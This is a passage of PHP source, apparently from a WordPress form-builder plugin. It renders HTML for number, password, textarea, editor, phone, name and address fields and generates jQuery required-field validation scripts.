						if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val().length > 0){
							if (RegExpression.test(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()) != true)
							{
								alert( " '.$param["w_regExp_alert"].' ");
								old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
								x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
								jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
								jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
								jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
								return false;
							}
						}
					}';
			   }
					
			  break;              
            }

            case 'type_number': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_required','w_unique','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : $param['w_first_val']);

              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size'] + 10 : max($param['w_field_label_size'],$param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	
                      
              $rep ='<div type="type_number" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section"  class="'.$param['w_class'].'" style="'.$param['w_field_label_pos1'].' width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" value="'.$param['w_first_val'].'" title="'.$param['w_title'].'" style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="'.$param['w_title'].'" || jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }
              break;
            }

            case 'type_password': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_required','w_unique','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
          
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size'] + 10 : max($param['w_field_label_size'],$param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	

              $rep ='<div type="type_password" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section"  class="'.$param['w_class'].'" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size'].'px;"><input type="password" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" style="width: 100%;" '.$param['attributes'].'></div></div>';
              
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }
              break;
            }

            case 'type_textarea': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size_w','w_size_h','w_first_val','w_title','w_required','w_unique','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }
            
              $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element'.$form_id])) : $param['w_first_val']);			
                
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size_w'] + 10 : max($param['w_field_label_size'],$param['w_size_w']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	
            
              $rep ='<div type="type_textarea" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size_w'].'px"><textarea class="'.$input_active.'" id="wdform_'.$id1.'_element'.$form_id.'" name="wdform_'.$id1.'_element'.$form_id.'" title="'.$param['w_title'].'"  style="width: 100%; height: '.$param['w_size_h'].'px;" '.$param['attributes'].'>'.$param['w_first_val'].'</textarea></div></div>';
             
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="'.$param['w_title'].'" || jQuery("#wdform_'.$id1.'_element'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_element'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }
              break;
            }

            case 'type_wdeditor': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size_w','w_size_h','w_title','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr)
                  $param['attributes'] = $param['attributes'].' '.$attr;
              }          
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? $param['w_field_label_size']+$param['w_size_w']+10 : max($param['w_field_label_size'],$param['w_size_w']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              
              $required = ($param['w_required']=="yes" ? true : false);	
            
              $rep ='<div type="type_wdeditor" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div><div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$param['w_size_w'].'px">';
              
              if(user_can_richedit()) {
                ob_start();
                wp_editor($param['w_title'], 'wdform_'.$id1.'_wd_editor'.$form_id, array('teeny' => FALSE, 'media_buttons' => FALSE, 'textarea_rows' => 5));
                $wd_editor = ob_get_clean();
              }
              else {
                $wd_editor = '<textarea  class="'.$param['w_class'].'" name="wdform_'.$id1.'_wd_editor'.$form_id.'" id="wdform_'.$id1.'_wd_editor'.$form_id.'" style="width: '.$param['w_size_w'].'px; height: '.$param['w_size_h'].'px; " class="mce_editable" aria-hidden="true">'.$param['w_title'].'</textarea>';
              }
              $rep.= $wd_editor.'</div></div>';
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(tinyMCE.get("wdform_'.$id1.'_wd_editor'.$form_id.'").getContent()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    jQuery("#wdform_'.$id1.'_wd_editor'.$form_id.'").addClass( "form-error" );
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_wd_editor'.$form_id.'").focus();
                    jQuery("#wdform_'.$id1.'_wd_editor'.$form_id.'").change(function() { if( jQuery(this).val()!="" ) jQuery(this).removeClass("form-error"); else jQuery(this).addClass("form-error");});
                    return false;
                  }
                }
                ';
              }             
              break;
            }

            case 'type_phone': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_first_val','w_title','w_mini_labels','w_required','w_unique', 'w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);
              
              $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element_first'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_first'.$form_id])) : $w_first_val[0]).'***'.(isset($_POST['wdform_'.$id1.'_element_last'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_last'.$form_id])) : $w_first_val[1]);
              
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']+65) : max($param['w_field_label_size'],($param['w_size']+65)));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $input_active = ($param['w_first_val']==$param['w_title'] ? "input_deactive" : "input_active");	
              $required = ($param['w_required']=="yes" ? true : false);	
              
              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);
              $w_mini_labels = explode('***',$param['w_mini_labels']);
          

              $rep ='<div type="type_phone" class="wdform-field" style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section '.$param['w_class'].'" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label" >'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='
              </div>
              <div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.($param['w_size']+65).'px;">
                <div style="display: table-cell;vertical-align: middle;">
                  <div><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.$w_first_val[0].'" title="'.$w_title[0].'" style="width: 50px;" '.$param['attributes'].'></div>
                  <div><label class="mini_label">'.$w_mini_labels[0].'</label></div>
                </div>
                <div style="display: table-cell;vertical-align: middle;">
                  <div class="wdform_line" style="margin: 0px 4px 10px 4px; padding: 0px;">-</div>
                </div>
                <div style="display: table-cell;vertical-align: middle; width:100%;">
                  <div><input type="text" class="'.$input_active.'" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.$w_first_val[1].'" title="'.$w_title[1].'" style="width: 100%;" '.$param['attributes'].'></div>
                  <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
                </div>
              </div>
              </div>';
            
              if($required) {
                $check_js.='
                if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                {
                  if(jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").val()=="'.$w_title[0].'" || jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_element_last'.$form_id.'").val()=="'.$w_title[1].'" || jQuery("#wdform_'.$id1.'_element_last'.$form_id.'").val()=="")
                  {
                    alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
                    old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
                    x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
                    jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").focus();
                    return false;
                  }
                  
                }
                ';
              }
              break;
            }

            case 'type_name': {
              $params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class');
              $temp = $params;
			  if(strpos($temp, 'w_name_fields') > -1)
				$params_names = array('w_field_label_size', 'w_field_label_pos', 'w_first_val', 'w_title', 'w_mini_labels', 'w_size', 'w_name_format', 'w_required', 'w_unique', 'w_class', 'w_name_fields');
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              
              $w_first_val = explode('***',$param['w_first_val']);
              $w_title = explode('***',$param['w_title']);

              $w_mini_labels = explode('***',$param['w_mini_labels']);
              $param['w_name_fields'] =  isset($param['w_name_fields']) ? $param['w_name_fields'] : ($param['w_name_format'] == 'normal' ? 'no***no' : 'yes***yes');
			  $w_name_fields = explode('***', $param['w_name_fields']);
			  
              $element_title = isset($_POST['wdform_'.$id1.'_element_title'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_title'.$form_id])) : NULL;
			  $element_middle = isset($_POST['wdform_'.$id1.'_element_middle'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_middle'.$form_id])) : NULL;
              $element_first = isset($_POST['wdform_'.$id1.'_element_first'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_first'.$form_id])) : NULL;
              if(isset($element_title) || isset($element_middle)) {
                $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element_first'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_first'.$form_id])) : $w_first_val[0]).'***'.(isset($_POST['wdform_'.$id1.'_element_last'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_last'.$form_id])) : $w_first_val[1]).'***'.(isset($_POST['wdform_'.$id1.'_element_title'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_title'.$form_id])) : $w_first_val[2]).'***'.(isset($_POST['wdform_'.$id1.'_element_middle'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_middle'.$form_id])) : $w_first_val[3]);
              }
              else {
                if(isset($element_first)) {
                  $param['w_first_val']=(isset($_POST['wdform_'.$id1.'_element_first'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_first'.$form_id])) : $w_first_val[0]).'***'.(isset($_POST['wdform_'.$id1.'_element_last'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_element_last'.$form_id])) : $w_first_val[1]);
                }
              }

              $required = ($param['w_required']=="yes" ? true : false);	
              $w_first_val = explode('***',$param['w_first_val']);

			  if($w_name_fields[0]== 'no' && $w_name_fields[1]== 'no' ) {
				$w_name_format = '
					<div style="display: table-cell; width:50%">
					  <div><input type="text" class="'.($w_first_val[0] == $w_title[0] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.$w_first_val[0].'" title="'.$w_title[0].'"  style="width: 100%;"'.$param['attributes'].'></div>
					  <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
					</div>
					<div style="display:table-cell;"><div style="margin: 0px 8px; padding: 0px;"></div></div>
					<div  style="display: table-cell; width:50%">
					  <div><input type="text" class="'.($w_first_val[1] == $w_title[1] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.$w_first_val[1].'" title="'.$w_title[1].'" style="width: 100%;" '.$param['attributes'].'></div>
					  <div><label class="mini_label">'.$w_mini_labels[2].'</label></div>
					</div>
					';
				$w_size=2*$param['w_size'];
			  }
              else {
				$first_last_size = $w_name_fields[0] == 'yes' && $w_name_fields[1] == 'no' ? 45 : 30;
				$w_name_format = '
					<div style="display: table-cell; width:'.$first_last_size.'%">
					  <div><input type="text" class="'.($w_first_val[0] == $w_title[0] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_first'.$form_id.'" name="wdform_'.$id1.'_element_first'.$form_id.'" value="'.$w_first_val[0].'" title="'.$w_title[0].'" style="width:100%;"></div>
					  <div><label class="mini_label">'.$w_mini_labels[1].'</label></div>
					</div>
					<div style="display:table-cell;"><div style="margin: 0px 4px; padding: 0px;"></div></div>
					<div style="display: table-cell; width:'.$first_last_size.'%">
					  <div><input type="text" class="'.($w_first_val[1] == $w_title[1] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_last'.$form_id.'" name="wdform_'.$id1.'_element_last'.$form_id.'" value="'.$w_first_val[1].'" title="'.$w_title[1].'" style="width:  100%;"></div>
					  <div><label class="mini_label">'.$w_mini_labels[2].'</label></div>
					</div>';
					
				$w_size = 2*$param['w_size'];
				if($w_name_fields[0] == 'yes') {
					$w_name_format = '
						<div style="display: table-cell;">
						  <div><input type="text" class="'.($w_first_val[2] == $w_title[2] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_title'.$form_id.'" name="wdform_'.$id1.'_element_title'.$form_id.'" value="'.$w_first_val[2].'" title="'.$w_title[2].'" style="width: 40px;"></div>
						  <div><label class="mini_label">'.$w_mini_labels[0].'</label></div>
						</div>
						<div style="display:table-cell;"><div style="margin: 0px 1px; padding: 0px;"></div></div>'.$w_name_format;
					$w_size	+= 80;
                }
				if($w_name_fields[1] == 'yes') {
					$w_name_format = $w_name_format.'
						<div style="display:table-cell;"><div style="margin: 0px 4px; padding: 0px;"></div></div>
						<div style="display: table-cell; width:30%">
						  <div><input type="text" class="'.($w_first_val[3] == $w_title[3] ? "input_deactive" : "input_active").'" id="wdform_'.$id1.'_element_middle'.$form_id.'" name="wdform_'.$id1.'_element_middle'.$form_id.'" value="'.$w_first_val[3].'" title="'.$w_title[3].'" style="width: 100%;"></div>
						  <div><label class="mini_label">'.$w_mini_labels[3].'</label></div>
						</div>						
						';
					$w_size	+= $param['w_size'];	
				}		
              }
        
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$w_size) : max($param['w_field_label_size'],$w_size));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");

              $rep ='<div type="type_name" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $rep.='</div>
              <div class="wdform-element-section '.$param['w_class'].'" style="'.$param['w_field_label_pos2'].' width: '.$w_size.'px;">'.$w_name_format.'</div></div>';

              if($required) {
                  $check_js.='
                  if(x.find(jQuery("div[wdid='.$id1.']")).length != 0 && x.find(jQuery("div[wdid='.$id1.']")).css("display") != "none")
                  {
                    if(jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").val()=="'.$w_title[0].'" || jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").val()=="" || jQuery("#wdform_'.$id1.'_element_last'.$form_id.'").val()=="'.$w_title[1].'" || jQuery("#wdform_'.$id1.'_element_last'.$form_id.'").val()=="" || (jQuery("#wdform_'.$id1.'_element_title'.$form_id.'").length != 0 && (jQuery("#wdform_'.$id1.'_element_title'.$form_id.'").val()=="'.(isset($w_title[2]) ? $w_title[2] : '').'" || jQuery("#wdform_'.$id1.'_element_title'.$form_id.'").val()=="")) || (jQuery("#wdform_'.$id1.'_element_middle'.$form_id.'").length != 0 && (jQuery("#wdform_'.$id1.'_element_middle'.$form_id.'").val()=="'.(isset($w_title[3]) ? $w_title[3] : '').'" || jQuery("#wdform_'.$id1.'_element_middle'.$form_id.'").val()=="")))
                    {
						alert("' .addslashes($label. ' ' . __('field is required.', 'form_maker')) . '");
						old_bg=x.find(jQuery("div[wdid='.$id1.']")).css("background-color");
						x.find(jQuery("div[wdid='.$id1.']")).effect( "shake", {}, 500 ).css("background-color","#FF8F8B").animate({backgroundColor: old_bg}, {duration: 500, queue: false });
						jQuery("#wdform_'.$id1.'_element_first'.$form_id.'").focus();
						return false;
                    }
                  }
                  ';	
              }
              break;
            }
            
            case 'type_address': {
              $params_names=array('w_field_label_size','w_field_label_pos','w_size','w_mini_labels','w_disabled_fields','w_required','w_class');
              $temp=$params;
              foreach($params_names as $params_name ) {
                $temp=explode('*:*'.$params_name.'*:*',$temp);
                $param[$params_name] = $temp[0];
                $temp=$temp[1];
              }
              if($temp) {	
                $temp	=explode('*:*w_attr_name*:*',$temp);
                $attrs	= array_slice($temp,0, count($temp)-1);   
                foreach($attrs as $attr) {
                  $param['attributes'] = $param['attributes'].' '.$attr;
                }
              }
              $wdformfieldsize = ($param['w_field_label_pos']=="left" ? ($param['w_field_label_size']+$param['w_size']) : max($param['w_field_label_size'], $param['w_size']));	
              $param['w_field_label_pos1'] = ($param['w_field_label_pos']=="left" ? "float: left;" : "");	
              $param['w_field_label_pos2'] = ($param['w_field_label_pos']=="left" ? "" : "display:block;");
              $required = ($param['w_required']=="yes" ? true : false);	
              $w_mini_labels = explode('***',$param['w_mini_labels']);
              $w_disabled_fields = explode('***', $param['w_disabled_fields']);
              $rep ='<div type="type_address" class="wdform-field"  style="width:'.$wdformfieldsize.'px"><div class="wdform-label-section" style="'.$param['w_field_label_pos1'].'; width: '.$param['w_field_label_size'].'px;"><span class="wdform-label">'.$label.'</span>';
              if ($required) {
                $rep.='<span class="wdform-required">'.$required_sym.'</span>';
              }
              $address_fields = '';
              $g = 0;
              if (isset($w_disabled_fields[0]) && $w_disabled_fields[0] == 'no') {
                $g+=2;
                $address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="wdform_'.$id1.'_street1'.$form_id.'" name="wdform_'.$id1.'_street1'.$form_id.'" value="'.(isset($_POST['wdform_'.$id1.'_street1'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.$id1.'_street1'.$form_id])) : "").'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[0].'</label></span>';
              }
              if (isset($w_disabled_fields[1]) && $w_disabled_fields[1]=='no') {
                $g+=2;
                $address_fields .= '<span style="float: left; width: 100%; padding-bottom: 8px; display: block;"><input type="text" id="wdform_'.$id1.'_street2'.$form_id.'" name="wdform_'.($id1+1).'_street2'.$form_id.'" value="'.(isset($_POST['wdform_'.($id1+1).'_street2'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+1).'_street2'.$form_id])) : "").'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[1].'</label></span>';
              }
              if (isset($w_disabled_fields[2]) && $w_disabled_fields[2]=='no') {
                $g++;
                $address_fields .= '<span style="float: left; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_city'.$form_id.'" name="wdform_'.($id1+2).'_city'.$form_id.'" value="'.(isset($_POST['wdform_'.($id1+2).'_city'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+2).'_city'.$form_id])) : "").'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label" >'.$w_mini_labels[2].'</label></span>';
              }
              if (isset($w_disabled_fields[3]) && $w_disabled_fields[3]=='no') {
                $g++;
                $w_states = array("","Alabama","Alaska", "Arizona","Arkansas","California","Colorado","Connecticut","Delaware","District Of Columbia","Florida","Georgia","Hawaii","Idaho","Illinois","Indiana","Iowa","Kansas","Kentucky","Louisiana","Maine","Maryland","Massachusetts","Michigan","Minnesota","Mississippi","Missouri","Montana","Nebraska","Nevada","New Hampshire","New Jersey","New Mexico","New York","North Carolina","North Dakota","Ohio","Oklahoma","Oregon","Pennsylvania","Rhode Island","South Carolina","South Dakota","Tennessee","Texas","Utah","Vermont","Virginia","Washington","West Virginia","Wisconsin","Wyoming");	
                $w_state_options = '';
                $post_state = isset($_POST['wdform_'.($id1+3).'_state'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+3).'_state'.$form_id])) : "";
                foreach($w_states as $w_state) {
                  if($w_state == $post_state) {
                    $selected = 'selected="selected"';
                  }
                  else {
                    $selected = '';
                  }
                  $w_state_options .= '<option value="'.$w_state.'" '.$selected.'>'.$w_state.'</option>';
                }
                if(isset($w_disabled_fields[5]) && $w_disabled_fields[5]=='yes' && isset($w_disabled_fields[6]) && $w_disabled_fields[6]=='yes') {
                  $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><select type="text" id="wdform_'.$id1.'_state'.$form_id.'" name="wdform_'.($id1+3).'_state'.$form_id.'" style="width: 100%;" '.$param['attributes'].'>'.$w_state_options.'</select><label class="mini_label" style="display: block;" id="'.$id1.'_mini_label_state">'.$w_mini_labels[3].'</label></span>';
                }
                else {
                  $address_fields .= '<span style="float: '.(($g%2==0) ? 'right' : 'left').'; width: 48%; padding-bottom: 8px;"><input type="text" id="wdform_'.$id1.'_state'.$form_id.'" name="wdform_'.($id1+3).'_state'.$form_id.'" value="'.(isset($_POST['wdform_'.($id1+3).'_state'.$form_id]) ? esc_html(stripslashes($_POST['wdform_'.($id1+3).'_state'.$form_id])) : "").'" style="width: 100%;" '.$param['attributes'].'><label class="mini_label">'.$w_mini_labels[3].'</label></span>';
                }
              }
              if (isset($w_disabled_fields[4]) && $w_disabled_fields[4]=='no') {
                $g++;
